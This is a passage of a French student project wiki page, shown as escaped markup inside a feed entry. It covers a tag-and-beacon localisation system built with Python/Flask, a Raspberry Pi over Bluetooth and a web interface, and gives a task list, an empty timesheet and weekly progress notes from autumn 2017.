    1) Serveur de collecte des données:&lt;br /&gt;
       Scanne et parse les données récupérées pour fournir la matrice D des distances relatives du tag aux 4 balises&lt;br /&gt;
        - API&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    2) Serveur de localisation (fourni):&lt;br /&gt;
       Calcule grâce à l'algorithme de localisation et la matrice D les positions spatiales des 4 noeuds et du tag&lt;br /&gt;
        - API&lt;br /&gt;
        - Bootstrap&lt;br /&gt;
        - Jquery&lt;br /&gt;
        - Python&lt;br /&gt;
&lt;br /&gt;
    3) Interface utilisateur:&lt;br /&gt;
       Affiche courbes, visualisation 3D, boutons ou données des fichiers envoyées par le serveur de localisation&lt;br /&gt;
        - HTML5 / Javascript&lt;br /&gt;
        - Fichiers JSON (serveurs de collecte et de localisation)&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Calendrier prévisionnel'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;Liste des tâches à effectuer&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
# Se documenter sur le projet&lt;br /&gt;
##Langages et technologies utilisées&lt;br /&gt;
##Matériel utilisé&lt;br /&gt;
##Mettre en place du travail sur le Git&lt;br /&gt;
# Réaliser le serveur de collecte&lt;br /&gt;
##Récupérer les trames envoyées par bluetooth par le TAG via la Raspberry Pi&lt;br /&gt;
##Intégrer le serveur de localisation pour interpréter les trames&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
# Réaliser l'interface Web utilisateur&lt;br /&gt;
##Implémenter le serveur de collecte et de localisation&lt;br /&gt;
##Afficher et traiter les données stockées dans les fichiers JSON via le serveur (temps différé + temps réel)&lt;br /&gt;
##Tester et optimiser&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Feuille d'heures'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Tâche !! Prélude !! Heures S1 !! Heures S2 !! Heures S3 !! Heures S4 !! Heures S5 !! Heures S6 !! Heures S7 !! Heures S8 !! Heures S9 !! Heures S10 !! Heures S11 !! Heures S12 !! Après Noël !! Total&lt;br /&gt;
|-&lt;br /&gt;
| Cahier des charges / Wiki / Gitlab&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur les technos utilisées&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Documentation sur le matériel&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement du serveur de collecte&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et développement de l'interface Web&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Recherche et intégration du serveur de localisation&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Intégration des différentes parties&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| Tests et débuggage&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| Optimisation/Correction des programmes&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|-&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|&lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Avancement du Projet'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Phase préparatoire'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 21/09/17 - Ven 22/09/17]]'' &lt;br /&gt;
*Rendez-vous de mise au point du cahier des charges avec les encadrants/intervenants (M. ZHENG Gang et M. DAGHER Roudy)&lt;br /&gt;
*Elaboration du cahier des charges&lt;br /&gt;
*Elaboration de la page Wiki (préparation de la mise en page et présentation du sujet)&lt;br /&gt;
*Préparation du travail sous forme de Mind Map&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 1'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 28/09/17 - Ven 29/09/17]]'' &lt;br /&gt;
*Revue du Cahier des Charges avec les encadrants&lt;br /&gt;
*Lecture et recherches sur les technologies adaptées&lt;br /&gt;
*Construction de la suite de la Mind Map&lt;br /&gt;
*Création du Gitlab&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 2'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 05/10/17 - Ven 06/10/17]]''  &lt;br /&gt;
*Précisions sur le cahier des charges&lt;br /&gt;
*Listage du matériel&lt;br /&gt;
*Recherche et détermination de solutions technologiques possibles pour les fonctions demandées&lt;br /&gt;
*Début du travail sur le serveur de collecte&lt;br /&gt;
*Apprentissage du langage Python et de l'utilisation du framework Flask&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 3'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Mer 11/10/17 - Jeu 12/10/17]]''  &lt;br /&gt;
*Recherche et développement initial du serveur de collecte de données&lt;br /&gt;
*Complément du Git sur les tâches à effectuer&lt;br /&gt;
&lt;br /&gt;
Nous avons commencé à créer un serveur flask renvoyant pour l'instant une matrice aléatoire. Lors de la requete URL &amp;quot;../matrice&amp;quot;, nous voyons bien une matrice aléatoire apparaitre sur la page WEB. Nous essayons de nous connecter à la Raspberry pi en redirigeant sont port série vers le Bluetooth de façon à récupérer de vrai matrices de distance entre le drone et les balises. Nous pourrons afficher ensuite ces matrices ou alors les stocker dans un fichier en attendant le traitement de celle ci.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Requete s3.PNG]]&lt;br /&gt;
&lt;br /&gt;
Nous avons plusieurs problème avec le Bluetooth pour se connecter avec la Raspberry pi. Quand nous aurons réussi à nous connecter au port série de la Raspberry pi alors nous pour gérer le traitement des données récupérées.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 4'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 19/10/17 - Ven 20/10/17]]''  &lt;br /&gt;
*&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;'''Semaine 5'''&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
''[[Jeu 26/10/17 - Ven 27/10/17]]''  &lt;br /&gt;
*&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	</feed>